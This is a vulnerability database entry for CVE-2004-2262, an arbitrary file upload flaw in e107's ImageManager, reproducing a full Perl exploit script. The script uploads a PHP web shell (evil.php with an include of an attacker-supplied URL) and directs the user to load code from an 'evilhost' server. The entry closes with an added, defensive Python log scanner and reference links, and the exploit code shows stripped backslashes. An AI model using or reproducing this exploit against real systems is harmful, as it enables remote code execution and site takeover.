E107 Image Manager Unauthorized File Upload Vulnerability

Vulnerability ID: 1108385  Vulnerability type: Input validation
Published: 2004-12-22  Updated: 2005-10-20
CVE ID: CVE-2004-2262
CNNVD-ID: CNNVD-200412-202
Platform: PHP  CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/704
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-202
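|Vulnerability details
ImageManager in e107 versions before 0.617 does not properly check the type of uploaded files. A remote attacker can execute arbitrary code by uploading a PHP file through the upload parameter of images.php.
|Exploit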
####################################################################
#
#  _____ _
# |  ___| | _____      ___
# | |_  | |/ _   / / /
# |  _| | | (_)  V  V /
# |_|   |_|___/ _/_/
#      Security Group.
#
#                    -=[ e107 remote sploit ]=-                           
#                           by sysbug 
#                              
# Attack method:                                                               
# with this sploit u can send an include() vuln to a Host victim  
# the upload go to /images/evil.php
#                                                                
# C:Perlbin>perl sploit.pl www.site.com                          
# -=[ e107 remote sploit ]=-                                      
#         by sysbug 
# # www.site.com
# # OWNED OH YEAH!                                                
# # get your evilc0de in:                                          
# # www.site.com/images/evil.php?owned=http://evilhost/ 
# C:Perlbin>                                                     
# 
# credits: ALL MY FRIENDS!                                                                 
# HELP ? RTFM -> perl sploit.pl                                                                
#####################################################################
use IO::Socket;

if(@ARGV < 1){
usage();
exit;
}
main();

sub main(){

print "-=[ e107 remote sploit ]=-n";
print "        by sysbug       nn";
$host[0] = $ARGV[0];
if($host[0] =~ ///){
($host[1],$host[2])=split(///,$host[0]);
$host[0] =~ //(.*)/;
$host[3] = "/";
$host[3] .= $1;
}
$host[1] = $host[0] if(!$host[1]);
@handlers =("e107_handlers","handlers");
print "# $host[1]n";
foreach $handler(@handlers){
$path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php";
$socket=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host[1],PeerPort=>80,Timeout=>10)|| die "  s0k offn";
print $socket "POST $path HTTP/1.1rn";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn";
print $socket "Referer: http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.phprn";
print $socket "Accept-Language: ptrn";
print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8rn";
print $socket "Accept-Encoding: gzip, deflatern";
print $socket "User-Agent: l33t br0ws3rrn";
print $socket "Host: $host[1]rn";
print $socket "Content-Length: 1646rn";
print $socket "Connection: Keep-Alivernrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="dirPath"rnrn";
print $socket "/rn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="url"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="width"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="vert"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="alt"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="height"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="horiz"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="upload"; filename="evil.php"rn";
print $socket "Content-Type: application/octet-streamrnrn";
print $socket "<? include($owned); ?>rn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="align"rnrn";
print $socket "baselinern";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="border"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="orginal_width"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="orginal_height"rnrnrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="constrain_prop"rnrn";
print $socket "onrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="ok"rnrn";
print $socket "Refreshrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="ok"rnrn";
print $socket "OKrn";
print $socket "-----------------------------7d410e113f8rn";
print $socket "Content-Disposition: form-data; name="cancel"rnrn";
print $socket "Cancelrn";
print $socket "-----------------------------7d410e113f8--rnrnrnrn";
@socket = <$socket>;
foreach $teste(@socket){
if($teste=~ /<title>Image Browser</title>/){
print "# OWNED OH YEAH!n";
print "# get your evilc0de in: n# $host[0]/images/evil.php?owned=http://evilhost/n";
$result = 1;
}
}
close($socket);
}
if($result){
exit;
}
print "# b4d upload!!";
}
sub usage(){
print "-=[ e107 remote sploit ]=-n";
print "        by sysbug       nn";
print "# usage: perl $0 <host> n";
}

# milw0rm.com [2004-12-22]
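
Added example, not part of the original advisory or exploit: a log check for the request sequence described above, a POST to ImageManager's images.php followed by a server-side script being served from /images/. The Combined Log Format, the sample lines (constructed) and the extension list are assumptions.

```python
import re
from urllib.parse import urlsplit

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Upload endpoint named in the advisory, under both handler directories.
UPLOAD_RE = re.compile(
    r'/(?:e107_handlers|handlers)/htmlarea/popups/ImageManager/images\.php$', re.I)
# Script extensions that should never be served from an image directory (assumed list).
SCRIPT_RE = re.compile(r'/images/[^/]+\.(?:php\d?|phtml|phar)$', re.I)

# Constructed sample input; addresses are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Dec/2004:10:00:01 +0000] "GET /images/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [22/Dec/2004:10:02:13 +0000] "POST /e107_handlers/htmlarea/popups/ImageManager/images.php HTTP/1.1" 404 310 "-" "l33t br0ws3r"',
    '203.0.113.9 - - [22/Dec/2004:10:02:14 +0000] "POST /handlers/htmlarea/popups/ImageManager/images.php HTTP/1.1" 200 2048 "-" "l33t br0ws3r"',
    '203.0.113.9 - - [22/Dec/2004:10:02:30 +0000] "GET /images/evil.php?owned=http://evilhost/ HTTP/1.1" 200 87 "-" "l33t br0ws3r"',
]

def scan(lines):
    """Return (upload_posts, script_hits, correlated) from access-log lines."""
    uploads, scripts, correlated = [], [], []
    upload_seen = False
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, target, status = m.groups()
        path = urlsplit(target).path  # match on the path, without the query string
        if method == "POST" and UPLOAD_RE.search(path):
            uploads.append((ts, ip, path, status))
            if status.startswith("2"):
                upload_seen = True  # the endpoint exists and accepted the POST
        elif SCRIPT_RE.search(path):
            scripts.append((ts, ip, target, status))
            # A script served from /images/ after an accepted ImageManager POST
            # is the upload-then-execute sequence the advisory describes.
            if upload_seen and status == "200":
                correlated.append((ts, ip, target))
    return uploads, scripts, correlated

if __name__ == "__main__":
    for label, rows in zip(("upload POST", "script in /images/", "correlated"),
                           scan(SAMPLE_LOG)):
        for row in rows:
            print(label, row)
```

Any correlated hit on a host running e107 before 0.617 warrants checking the images directory for files that are not images; the durable fix is the upgrade plus disabling script execution in upload directories.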
|References

Source: e107.org
Link: http://e107.org/comment.php?comment.news.672
Source: XF
Name: e107-images-file-upload(18670)
Link: http://xforce.iss.net/xforce/xfdb/18670
Source: BID
Name: 12111
Link: http://www.securityfocus.com/bid/12111
Source: OSVDB
Name: 12586
Link: http://www.osvdb.org/12586
Source: SECTRACK
Name: 1012657
Link: http://securitytracker.com/id?1012657
Source: SECUNIA
Name: 13657
Link: http://secunia.com/advisories/13657
Source: MILW0RM
Name: 704
Link: http://milw0rm.com/exploits/704